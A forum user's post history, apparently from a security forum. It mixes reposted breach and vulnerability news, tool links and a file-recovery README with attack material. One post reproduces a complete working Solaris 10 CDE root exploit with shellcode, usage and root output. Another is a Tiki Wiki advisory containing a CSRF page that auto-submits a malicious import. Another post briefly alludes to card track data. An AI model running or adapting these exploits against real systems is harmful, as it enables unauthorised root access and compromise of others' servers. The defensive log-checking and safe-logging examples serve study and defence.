
Kev
Active Members
Posts: 1026
Joined
Days Won: 55

Everything posted by Kev

  1. Hi, does anyone still have it? http://www.javascriptkit.com/howto/externalhtml.shtml P.S. I wanted Neme's one
  2. Tally.Work is an AI cover letter generator that creates a cover letter from your resume and a job description in seconds. It's intuitive, saves you time and works great as a starting point. URL: https://tally.work Via Google
  3. North Korea-linked hackers stole $1.7bn of cryptocurrency in 2022

     North Korea-backed hackers stole $1.7bn (£1.4bn) of crypto in 2022, says blockchain analysis firm Chainalysis. This nearly quadruples the country's previous record for cryptocurrency theft - $429m in 2021. The loot also made up 44% of the $3.8bn stolen in crypto hacks last year, which the firm called "the biggest year ever for crypto hacking".

     Experts have said the country, facing heavy sanctions, is turning to crypto theft to fund its nuclear arsenal. North Korea has conducted six nuclear tests and analysts expect the seventh one this year, as the country accelerates its nuclear weapons programme under leader Kim Jong-un. Last year, Pyongyang launched a record number of ballistic and other missiles. This is despite the country's struggling economy.

     These hackers typically launder crypto through "mixers", which blend cryptocurrencies from various users to obfuscate the origins of the funds, the firm said. Other experts have also said that North Korea launders stolen crypto through brokers in China and non-fungible tokens (NFTs). Last month, the FBI confirmed that North Korea-affiliated Lazarus Group was responsible for a $100m crypto heist on a blockchain network called Horizon bridge last year.

     Overall, decentralised finance protocols, or DeFi, accounted for over 82% of cryptocurrency stolen in 2022, Chainalysis' report said. DeFi users know what will happen to their funds when they use them because smart contract codes governing these protocols are publicly accessible by default. But this transparency also makes DeFi particularly attractive to hackers, who can scan the codes for vulnerabilities and "strike at the perfect time" to maximise their loot, according to the report.

     David Schwed, chief operating officer at blockchain security firm Halborn, noted that DeFi developers "prioritise growth over all else", and funds that could be used to enhance security are often directed instead to rewards, in order to attract users. DeFi developers can take a leaf from traditional financial institutions in making their platforms more secure, Mr Schwed said. For instance, they can simulate different hacking scenarios to test their protocols, or design mechanisms to pause or halt transactions when suspicious activity is detected. "You don't need to move as slow as a bank, but you can borrow from what banks do," he said.

     Via bbc.com
  4. MAC Address Search

     Link: https://mac.lc found on bing.com
  5. Monzo, Monese, cheap ones like those... instant, including Transilvania, Revolut....
  6. Here we go again? Track1,2,3--- Careful, better to ask how they don't steal from you
  7. Solaris 10 CDE local privilege escalation exploit that achieves root by injecting a fake printer via lpstat and uses a buffer overflow in libXM ParseColors().

```c
/*
 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
 * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * "What has been will be again,
 * what has been done will be done again;
 * there is nothing new under the Sun."
 * -- Ecclesiastes 1:9
 *
 * #Solaris #CDE #0day #ForeverDay #WontFix
 *
 * This exploit illustrates yet another way to abuse the infamous dtprintinfo
 * binary distributed with the Common Desktop Environment (CDE), a veritable
 * treasure trove for bug hunters since the 1990s. It's not the most reliable
 * exploit I've ever written, but I'm quite proud of the new vulnerabilities
 * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January
 * 2021) applied. The exploit chain is structured as follows:
 * 1. Inject a fake printer via the printer injection bug I found in lpstat.
 * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors().
 * 3. Enjoy root privileges!
 *
 * For additional details on my bug hunting journey and on the vulnerabilities
 * themselves, you can refer to the official advisory:
 * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt
 *
 * Usage:
 * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall
 * $ ./raptor_dtprintlibXmas 10.0.0.109:0
 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
 * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Using SI_PLATFORM       : i86pc (5.10)
 * Using stack base        : 0x8047fff
 * Using safe address      : 0x8045790
 * Using rwx_mem address   : 0xfeffa004
 * Using sc address        : 0x8047fb4
 * Using sprintf() address : 0xfefd1250
 * Path of target binary   : /usr/dt/bin/dtprintinfo
 *
 * On your X11 server:
 * 1. Select the "fnord" printer, then click on "Selected" > "Properties".
 * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu.
 *
 * Back to your original shell:
 * # id
 * uid=0(root) gid=1(other)
 *
 * IMPORTANT NOTE.
 * The buffer overflow corrupts some critical variables in memory, which we
 * need to fix. In order to do so, we must patch the hostile buffer at some
 * fixed locations with the first argument of the last call to ParseColors().
 * The easiest way to get such a safe address is via the special 0x41414141
 * command-line argument and truss, as follows:
 * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT
 * $ grep ParseColors OUT | tail -1
 * 29181/1@1:  -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724)
 *                                  ^^^^^^^^^ << this is the safe address we need
 *
 * Tested on:
 * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021)
 * [previous Solaris versions are also likely vulnerable]
 */

#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>

#define INFO1   "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE"
#define INFO2   "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define VULN    "/usr/dt/bin/dtprintinfo"   // vulnerable program
#define DEBUG   "/tmp/XXXXXXXXXXXXXXXXXX"   // target for debugging
#define BUFSIZE 1106                        // size of hostile buffer
#define PADDING 1                           // hostile buffer padding
#define SAFE    0x08045770                  // 1st arg to ParseColors()

char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */
/* triple setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";

/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;

/* prototypes */
int add_env(char *string);
void check_bad(int addr, char *name);
int get_env_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
    char buf[BUFSIZE], cmd[1024], *vuln = VULN;
    char platform[256], release[256], display[256];
    int i, sc_addr, safe_addr = SAFE;
    FILE *fp;

    int sb = ((int)argv[0] | 0xfff);    // stack base
    int ret = search_ldso("sprintf");   // sprintf() in ld.so.1
    int rwx_mem = search_rwx_mem();     // rwx memory

    /* helper that prints argv[0] address, used by get_env_addr() */
    if (!strcmp(argv[0], arg[0])) {
        printf("0x%p\n", argv[0]);
        exit(0);
    }

    /* print exploit information */
    fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

    /* process command line */
    if ((argc < 2) || (argc > 3)) {
        fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]);
        exit(1);
    }
    snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]);
    if (argc > 2) {
        safe_addr = (int)strtoul(argv[2], (char **)NULL, 0);
    }

    /* enter debug mode */
    if (safe_addr == 0x41414141) {
        unlink(DEBUG);
        snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG);
        if (system(cmd) == -1) {
            perror("error creating debug binary");
            exit(1);
        }
        vuln = DEBUG;
    }

    /* fill envp while keeping padding */
    add_env("LPDEST=fnord");            // injected printer
    add_env("HOME=/tmp");               // home directory
    add_env("PATH=/usr/bin:/bin");      // path
    sc_addr = add_env(display);         // x11 display
    add_env(sc);                        // shellcode
    add_env(NULL);

    /* calculate shellcode address */
    sc_addr += get_env_addr(vuln, argv);

    /* inject a fake printer */
    unlink("/tmp/.printers");
    unlink("/tmp/.printers.new");
    if (!(fp = fopen("/tmp/.printers", "w"))) {
        perror("error injecting a fake printer");
        exit(1);
    }
    fprintf(fp, "fnord :\n");
    fclose(fp);
    link("/tmp/.printers", "/tmp/.printers.new");

    /* craft the hostile buffer */
    bzero(buf, sizeof(buf));
    for (i = PADDING; i < BUFSIZE - 16; i += 4) {
        set_val(buf, i, ret);           // sprintf()
        set_val(buf, i += 4, rwx_mem);  // saved eip
        set_val(buf, i += 4, rwx_mem);  // 1st arg
        set_val(buf, i += 4, sc_addr);  // 2nd arg
    }
    memcpy(buf, "\"c c ", 5);           // beginning of hostile buffer
    buf[912] = ' ';                     // string separator
    set_val(buf, 1037, safe_addr);      // safe address
    set_val(buf, 1065, safe_addr);      // safe address
    set_val(buf, 1073, 0xffffffff);     // -1

    /* create the hostile XPM icon files */
    system("rm -fr /tmp/.dt");
    mkdir("/tmp/.dt", 0755);
    mkdir("/tmp/.dt/icons", 0755);
    if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) {
        perror("error creating XPM icon files");
        exit(1);
    }
    fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf);
    fclose(fp);
    link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm");
    link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm");

    /* print some output */
    sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
    sysinfo(SI_RELEASE, release, sizeof(release) - 1);
    fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
    fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
    fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr);
    fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
    fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
    fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret);
    fprintf(stderr, "Path of target binary\t: %s\n\n", vuln);

    /* check for badchars */
    check_bad(safe_addr, "safe address");
    check_bad(rwx_mem, "rwx_mem address");
    check_bad(sc_addr, "sc address");
    check_bad(ret, "sprintf() address");

    /* run the vulnerable program */
    execve(vuln, arg, env);
    perror("execve");
    exit(0);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
    int i;

    /* null termination */
    if (!string) {
        env[env_pos] = NULL;
        return env_len;
    }

    /* add the variable to envp */
    env[env_pos] = string;
    env_len += strlen(string) + 1;
    env_pos++;

    /* pad envp using zeroes */
    if ((strlen(string) + 1) % 4)
        for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
            env[env_pos] = string + strlen(string);
            env_len++;
        }

    return env_len;
}

/*
 * check_bad(): check an address for the presence of badchars
 */
void check_bad(int addr, char *name)
{
    int i, bad[] = {0x00, 0x09, 0x20};  // NUL, HT, SP

    for (i = 0; i < sizeof(bad) / sizeof(int); i++) {
        if (((addr & 0xff) == bad[i]) ||
            ((addr & 0xff00) == bad[i]) ||
            ((addr & 0xff0000) == bad[i]) ||
            ((addr & 0xff000000) == bad[i])) {
            fprintf(stderr, "error: %s contains a badchar\n", name);
            exit(1);
        }
    }
}

/*
 * get_env_addr(): get environment address using a helper program
 */
int get_env_addr(char *path, char **argv)
{
    char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    char hex[11];
    int fd[2], addr;

    /* truncate program name at correct length and create a hard link */
    prog[strlen(path)] = '\0';
    unlink(prog);
    link(argv[0], prog);

    /* open pipe to read program output */
    if (pipe(fd) == -1) {
        perror("pipe");
        exit(1);
    }

    switch(fork()) {
    case -1: /* cannot fork */
        perror("fork");
        exit(1);

    case 0: /* child */
        dup2(fd[1], 1);
        close(fd[0]);
        close(fd[1]);
        execve(prog, arg, env);
        perror("execve");
        exit(1);

    default: /* parent */
        close(fd[1]);
        read(fd[0], hex, sizeof(hex));
        break;
    }

    /* check address */
    if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
        fprintf(stderr, "error: cannot read address from helper\n");
        exit(1);
    }

    return addr + strlen(arg[0]) + 1;
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
    int addr;
    void *handle;
    Link_map *lm;

    /* open the executable object file */
    if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
        perror("dlopen");
        exit(1);
    }

    /* get dynamic load information */
    if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
        perror("dlinfo");
        exit(1);
    }

    /* search for the address of the symbol */
    if ((addr = (int)dlsym(handle, sym)) == NULL) {
        fprintf(stderr, "sorry, function %s() not found\n", sym);
        exit(1);
    }

    /* close the executable object file */
    dlclose(handle);

    return addr;
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
    int fd;
    char tmp[16];
    prmap_t map;
    int addr = 0, addr_old;

    /* open the proc filesystem */
    sprintf(tmp,"/proc/%d/map", (int)getpid());
    if ((fd = open(tmp, O_RDONLY)) < 0) {
        fprintf(stderr, "can't open %s\n", tmp);
        exit(1);
    }

    /* search for the last RWX memory segment before stack (last - 1) */
    while (read(fd, &map, sizeof(map)))
        if (map.pr_vaddr)
            if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
                addr_old = addr;
                addr = map.pr_vaddr;
            }
    close(fd);

    /* add 4 to the exact address NUL bytes */
    if (!(addr_old & 0xff))
        addr_old |= 0x04;
    if (!(addr_old & 0xff00))
        addr_old |= 0x0400;

    return addr_old;
}

/*
 * set_val(): copy a dword inside a buffer (little endian)
 */
void set_val(char *buf, int pos, int val)
{
    buf[pos] = (val & 0x000000ff);
    buf[pos + 1] = (val & 0x0000ff00) >> 8;
    buf[pos + 2] = (val & 0x00ff0000) >> 16;
    buf[pos + 3] = (val & 0xff000000) >> 24;
}
```

     Source
  8. Exploiting vulnerability with 9.8 severity rating isn't particularly hard.

     More than 4,400 Internet-exposed servers are running versions of the Sophos Firewall that are vulnerable to a critical exploit that allows hackers to execute malicious code, a researcher has warned.

     CVE-2022-3236 is a code-injection vulnerability allowing remote code execution in the User Portal and Webadmin of Sophos Firewalls. It carries a severity rating of 9.8 out of 10. When Sophos disclosed the vulnerability last September, the company warned it had been exploited in the wild as a zero-day. The security company urged customers to install a hotfix and, later on, a full-blown patch to prevent infection.

     According to recently published research, more than 4,400 servers running the Sophos firewall remain vulnerable. That accounts for about 6 percent of all Sophos firewalls, security firm VulnCheck said, citing figures from a search on Shodan. The researcher said he was able to create a working exploit for the vulnerability based on technical descriptions in this advisory from the Zero Day Initiative. The research's implicit warning: Should exploit code become public, there's no shortage of servers that could be infected.

     Baines urged Sophos firewall users to ensure they're patched. He also advised users of vulnerable servers to check for two indicators of possible compromise. The first is the log file located at /logs/csc.log, and the second is /log/validationError.log. When either contains the_discriminator field in a login request, there likely was an attempt, successful or otherwise, to exploit the vulnerability, he said. The silver lining in the research is that mass exploitation isn't likely because of a CAPTCHA that must be completed during authentication by web clients.

     In a statement, Sophos officials wrote: "Sophos took immediate steps to remediate this issue with an automated hotfix sent out in September 2022. We also alerted users who don't receive automatic hotfixes to apply the update themselves. The remaining 6% of the Internet-facing versions that Baines is guestimating in his article are running old, unsupported version of the software. This is a good opportunity to remind these users, as well as all users of any type of outdated software, to follow best security practices and upgrade to the most recent version available, like Sophos does on a regular basis with its customers."

     Via arstechnica.com
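A small log check for the two indicators named in the post, added here as an example (not the article's or VulnCheck's code): it flags login requests carrying a `the_discriminator` field in `/logs/csc.log` and `/log/validationError.log`; the sample lines and their layout are constructed, since the real log format is not shown.

```python
"""Added example: scan the two Sophos Firewall logs named in the article for
login requests that carry the `the_discriminator` field. Log layout is assumed."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Log files named in the article; missing files are skipped, not fatal.
IOC_LOG_FILES = ["/logs/csc.log", "/log/validationError.log"]
INDICATOR = "the_discriminator"
# A "login request" is approximated as any line mentioning login; adjust to the
# real log format once you have a sample from your own appliance.
LOGIN_RE = re.compile(r"login", re.IGNORECASE)


@dataclass(frozen=True)
class Hit:
    source: str
    line_no: int
    text: str


def scan_lines(source: str, lines: Iterable[str]) -> List[Hit]:
    """Return every line that is both a login request and carries the indicator."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, start=1):
        if INDICATOR in line and LOGIN_RE.search(line):
            hits.append(Hit(source, n, line.rstrip("\n")))
    return hits


def scan_files(paths: Iterable[str] = IOC_LOG_FILES) -> List[Hit]:
    """Scan each named log; a file that does not exist on this host is skipped."""
    hits: List[Hit] = []
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits.extend(scan_lines(path, fh))
        except FileNotFoundError:
            continue
    return hits


# Constructed sample lines (assumed format): a benign login, a login carrying
# the indicator, and an unrelated line that merely mentions the string.
SAMPLE_CSC_LOG = [
    "2023-01-17 10:02:11 INFO  POST /userportal/Controller?mode=451 login ok user=alice",
    "2023-01-17 10:05:43 WARN  POST /userportal/Controller?mode=451 login failed "
    "fields=username,password,the_discriminator",
    "2023-01-17 10:06:00 DEBUG config reload; schema key the_discriminator ignored",
]


def demo() -> List[Hit]:
    """Run the scanner over the constructed sample; only the second line is a hit."""
    return scan_lines("csc.log (sample)", SAMPLE_CSC_LOG)


if __name__ == "__main__":
    for hit in scan_files() or demo():
        print(f"{hit.source}:{hit.line_no}: {hit.text}")
```

A hit is a reason to investigate, not proof of compromise: the article says it indicates an attempt, successful or otherwise.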
  9. RecoverPy

     RecoverPy is a powerful tool that leverages your system capabilities to recover lost files. Unlike others, you can not only recover deleted files but also overwritten data. Every block of your partition will be scanned. You can even find a string in binary files.

     Installation

     RecoverPy is currently only available on Linux systems.

     Dependencies

     Mandatory: To list and search through your partitions, recoverpy uses grep, dd, and lsblk commands. Although, if you're running a major Linux distribution these tools should already be installed.
     Optional: To display real time grep progress, you can install progress.

     To install all dependencies:
     Debian-like: apt install grep coreutils util-linux progress
     Arch: pacman -S grep coreutils util-linux progress
     Fedora: dnf install grep coreutils util-linux progress

     Installation from pip

     python3 -m pip install recoverpy

     Usage

     python3 -m recoverpy

     You must be root or use sudo.

     1. Select the system partition in which your file was. If you are out of luck, you can alternatively search in your home partition, maybe your IDE, text editor, etc. made a backup at some point.
     2. Type a text string to search. See tips below for better results.
     3. Start search. Results will appear in the left-hand box.
     4. Select a result.
     5. Once you have found your precious, select Open.
     6. You can now either save this block individually or explore neighboring blocks for the remaining parts of the file. You could then save it all in one file.

     Tips

     Always do backups! Yes, maybe too late...
     Unmount your partition before you do anything! Although you can search with your partition still mounted, it is highly recommended to unmount your partition to avoid any alteration to your file.
     Regarding the searched string:
     - Be concise, find something that could be unique to your file.
     - Stay simple, your string is escaped but exotic characters may affect your results.
     - Try to remember the last edit you have made to your file.
     When you have found your file:
     - You might see multiple results. Your system often uses different partition blocks to save successive versions of a file. Make sure you've found the last version.
     - Try exploring neighboring blocks to be sure to save your whole file.

     Contributing

     Thank you for considering contributing to RecoverPy. Any request, bug report or PR are welcome. Please read the contributing guide.

     Download: RecoverPy-main.zip or git clone https://github.com/PabloLec/RecoverPy.git

     Source: github.com
  10. A patch was released in October, but not all servers have installed it.

     Malicious hackers have begun exploiting a critical vulnerability in unpatched versions of the Control Web Panel, a widely used interface for web hosting. "This is an unauthenticated RCE," members of the Shadowserver group wrote on Twitter, using the abbreviation for remote code exploit. "Exploitation is trivial and a PoC published." PoC refers to a proof-of-concept code that exploits the vulnerability.

     The vulnerability is tracked as CVE-2022-44877. It was discovered by Numan Türle of Gais Cyber Security and patched in October in version 0.9.8.1147. Advisories didn't go public until earlier this month, however, making it likely some users still aren't aware of the threat.

     Figures provided by security firm GreyNoise show that attacks began on January 7 and have slowly ticked up since then, with the most recent round continuing through Wednesday. The company said the exploits are coming from four separate IP addresses located in the US, Netherlands, and Thailand. Shadowserver shows that there are roughly 38,000 IP addresses running Control Web Panel, with the highest concentration in Europe, followed by North America and Asia.

     The severity rating for CVE-2022-44877 is 9.8 out of a possible 10. "Bash commands can be run because double quotes are used to log incorrect entries to the system," the advisory for the vulnerability stated. As a result, unauthenticated hackers can execute malicious commands during the login process. The following video demonstrates the flow of the exploit.

     Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

     The vulnerability resides in the /login/index.php component and resulted from CWP using a faulty structure when logging incorrect entries, according to the Daily Swig. The structure is:

     echo "incorrect entry, IP address, HTTP_REQUEST_URI" >> /blabla/wrong.log

     "Since the request URI comes from the user, and as you can see it is within double quotes, it is possible to run commands such as $(blabla), which is a bash feature," Türle told the publication.

     Given the ease and severity of exploitation and the availability of working exploit code, organizations using Control Web Panel should ensure they're running version 0.9.8.1147 or higher.

     Via arstechnica.com
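The faulty logging structure quoted above, reproduced as an added example (not CWP's own code) next to a hardened logger that never hands the request URI to a shell. The IP, log path and the harmless `$(echo INJECTED)` canary are constructed.

```python
"""Added example: the shell-backed logging pattern from the advisory beside a
hardened one. Running it shows why double quotes do not protect a
user-controlled request URI from command substitution."""
import os
import subprocess
import tempfile

CANARY = "INJECTED"


def log_bad_entry_unsafe(ip: str, request_uri: str, logfile: str) -> None:
    """Mirrors the vulnerable structure: the URI is interpolated inside double
    quotes in a command string that /bin/sh interprets, so $(...) and backticks
    are expanded by the shell before echo ever sees the text."""
    cmd = f'echo "incorrect entry, {ip}, {request_uri}" >> "{logfile}"'
    subprocess.run(cmd, shell=True, check=True)


def log_bad_entry_safe(ip: str, request_uri: str, logfile: str) -> None:
    """Hardened: the line is written as data; no shell is involved, so shell
    metacharacters in the URI are just bytes in the log."""
    with open(logfile, "a", encoding="utf-8", errors="replace") as fh:
        fh.write(f"incorrect entry, {ip}, {request_uri}\n")


def last_logged_uri(logfile: str) -> str:
    """Return the URI field of the last log line, or '' if the log is empty."""
    with open(logfile, encoding="utf-8") as fh:
        lines = fh.read().splitlines()
    return lines[-1].split(", ", 2)[2] if lines else ""


def run_one(unsafe: bool) -> str:
    """Log one hostile URI through the chosen logger and return what was recorded."""
    hostile_uri = f"/login/index.php?x=$(echo {CANARY})"  # constructed, harmless canary
    fd, path = tempfile.mkstemp(suffix=".log")
    os.close(fd)
    try:
        logger = log_bad_entry_unsafe if unsafe else log_bad_entry_safe
        logger("203.0.113.7", hostile_uri, path)
        return last_logged_uri(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    # The unsafe logger records "...x=INJECTED": the substitution ran.
    # The safe logger records "...x=$(echo INJECTED)" literally.
    print("unsafe logger recorded:", run_one(unsafe=True))
    print("safe   logger recorded:", run_one(unsafe=False))
```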
  11. https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-january-2023 Good luck! Credit: Jessica Haworth
  12. Link :https://www.fly.faa.gov/adv/advADB.jsp Via Google
  13. Message to ISP Me: ISP: Me: ISP: Sorry for the double post, I thought no notification shows up for an edit
  14. Unicode

     Url: https://www.compart.com/en/unicode/ Enjoy! P.S. Found on google
  15. LogLog-Beta and More: A New Algorithm for Cardinality Estimation Based on LogLog Counting - by Jason Qin, Denys Kim, Yumei Tung

     TL;DR: Better than HyperLogLog at approximating the number of unique elements in a set

     LogLog-Beta

     LogLog-Beta is a new algorithm for estimating cardinalities based on LogLog counting. The new algorithm uses only one formula and needs no additional bias corrections for the entire range of cardinalities, therefore, it is more efficient and simpler to implement. The simulations show that the accuracy provided by the new algorithm is as good as or better than the accuracy provided by either of HyperLogLog or HyperLogLog++.

     Example

```zig
const std = @import("std");
const HyperLogLog = @import("zig-hyperloglog").DefaultHyperLogLog;
const RndGen = std.rand.DefaultPrng;

var rnd = RndGen.init(0);

pub fn main() !void {
    const count = 1e7;
    const alloc = std.heap.page_allocator;
    var hll = try HyperLogLog().init(alloc);
    defer hll.deinit();

    var i: u64 = 0;
    while (i < count) : (i += 1) {
        const x = rnd.random().int(u64);
        try hll.add_hashed(x);
    }

    const est = hll.cardinality();
    std.debug.print("Estimated cardinality: {d}\n", .{est});
}
```

     Source: github.com
  16. Highly confidential documents from 14 schools have been leaked online by hackers, the BBC can reveal.

     Following a hack, Vice Society makes demands for money to prevent it leaking documents on the dark web.

     One of those was Pates Grammar School in Gloucestershire, targeted by a hacking group called Vice Society. The documents, seen by the BBC, include children's SEN information, child passport scans, staff pay scales and contract details, taken in 2021 & 2022. A spokesperson for Pates Grammar School said it took the security of its systems and data extremely seriously.

     The Vice Society has been behind a high-profile string of attacks on schools across the UK and the USA in recent months. It allegedly stole 500 gigabytes of data from the entire Los Angeles Unified School District, according to technology website Wired. The FBI in America has already released an alert on the group's activities. When data is stolen, Vice Society makes demands for money before leaking the documents if payment is not made.

     The Vice Society's website contained thousands of documents hacked from schools.

     The documents stolen from Pates Grammar School were comprehensive, with hackers taking documents using generic search terms. One folder marked "passports" contains passport scans for pupils and parents on school trips going back to 2011, whereas another marked "contract" contains contractual offers made to staff alongside teaching documents on muscle contractions. Another folder marked "confidential" contains documents on the headmaster's pay, and student bursary fund recipients.

     Alongside information from Pates, the BBC found confidential documents purporting to be from the following establishments on Vice Society's website. Every school on this list has been contacted for comment.

     - Carmel College, St Helens
     - Durham Johnston Comprehensive School (hacked in 2021, documents posted online in January 2022)
     - Frances King School of English, London/Dublin. Frances King said it hadn't notified parents and pupils, but the hack didn't affect teaching and it was reported to their IT company.
     - Gateway College, Hamilton, Leicester
     - Holy Family RC + CE College, Heywood
     - Lampton School, Hounslow, London. Lampton School issued a statement that read: "Teachers were aware of the breach but we did not inform them of the data that was stolen. The ICO did not tell us to notify the data subjects. We blocked remote access to all but a small number of staff with two-factor authentication, and all our passwords have been reset."
     - Mossbourne Federation, London. Mossbourne Federation said: "Parents, pupils, staff and all concerned were immediately notified and kept up-to-date during the recovery process. We have fully recovered from the cyber-attack and have returned to normal operations."
     - Pilton Community College, Barnstaple
     - Samuel Ryder Academy, St Albans
     - School of Oriental and African Studies, London
     - St Paul's Catholic College, Sunbury-on-Thames
     - Test Valley School, Stockbridge
     - The De Montfort School, Evesham. The De Montfort School declined to comment.

     The School of Oriental and African Studies confirmed it was hacked in September 2022, with staff contracts and budget details leaked among some 18,680 other files. "We notified staff and students of the incident, and while we were able to prevent the incident escalating, it resulted in a small, limited data breach of files on internal storage. The individuals affected have been contacted, and we are continuing to offer support as required," a spokesperson said.

     Hackers leaked the information on the dark web, a section of the internet often used by criminals. The dark web is not indexed on regular search engines, and requires specialist browsing software to access it.

     Pates Grammar School was one of those hacked by Vice Society.

     Pates' hacking timeline

     The hack at Pates is estimated to have taken place on 28 September, when the school emailed parents to say its IT systems and phone lines were down. A few days later the school emailed again with Gmail accounts it had created for parents to contact. On 7 October, the headteacher emailed again to say its systems were "accessed by an unauthorised third party." Teaching materials, which relied on Microsoft Teams, were affected, and the school said it had notified the Information Commissioner's Office (ICO) and police. At that time, the headmaster wrote: "There is currently no evidence that data has been stolen or published."

     Five days later, the school emailed parents again. The headmaster wrote: "Regrettably, it now appears that some of our data was taken by the criminal organisation and placed on its dark web site, which is not easily accessible and only available to a limited audience with the technical knowledge and ability to access this specific site. If we learn that any significant data has been affected in this way, you will be informed and provided with guidance and assistance."

     The ICO and Gloucestershire Police confirmed they were investigating the alleged breaches in 2022. A spokesperson for Pates Grammar School said: "We are currently working closely with cyber-security specialists to conduct a thorough assessment and analysis of this data. We are working with highly experienced forensic investigators to secure our systems and resolve the issue. We have successfully restored key systems, minimised the disruption to staff and students, and continue to keep the relevant authorities informed of any new developments."

     Ross Brewer, chief revenue officer of cyber-security risk management company SimSpace, said: "We see the education and healthcare sectors being heavily targeted due to their primary focus being on education and care, not cybersecurity. They are typically under resourced in the IT function and are easy prey for the hackers that have no heart and are purely motivated by greed. The personal information that can be obtained is highly valuable or in some cases embarrassing. Organisations need to train their teams in the safe cyber range environment, so they know what to look for, how to identify gaps in their protection, and how to continually improve their digital hygiene."

     Via bbc.com
  17. Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.

----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability
----------------------------------------------------------------------------------------------------

[-] Software Link:
https://tiki.org

[-] Affected Versions:
Version 24.1 and prior versions.

[-] Vulnerability Description:
The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the 'tiki_p_admin_importer' permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:

```html
<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" />
  <input type="hidden" name="importAttachments" value="on" />
  <input type="file" name="importFile" id="fileinput"/>
</form>
<script>
  // base64-encoded WordPress export carrying the serialized payload;
  // the blob is truncated in the source and is omitted here
  const xmlContent = atob("...");
  const fileInput = document.getElementById("fileinput");
  const dataTransfer = new DataTransfer();
  const file = new File([xmlContent], "test.xml", {type: "text/xml"});
  dataTransfer.items.add(file);
  fileInput.files = dataTransfer.files;
  document.forms[0].submit();
</script>
</html>
```

[-] Solution:
Upgrade to version 24.2 or later.

[-] Disclosure Timeline:
[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure

[-] CVE Reference:
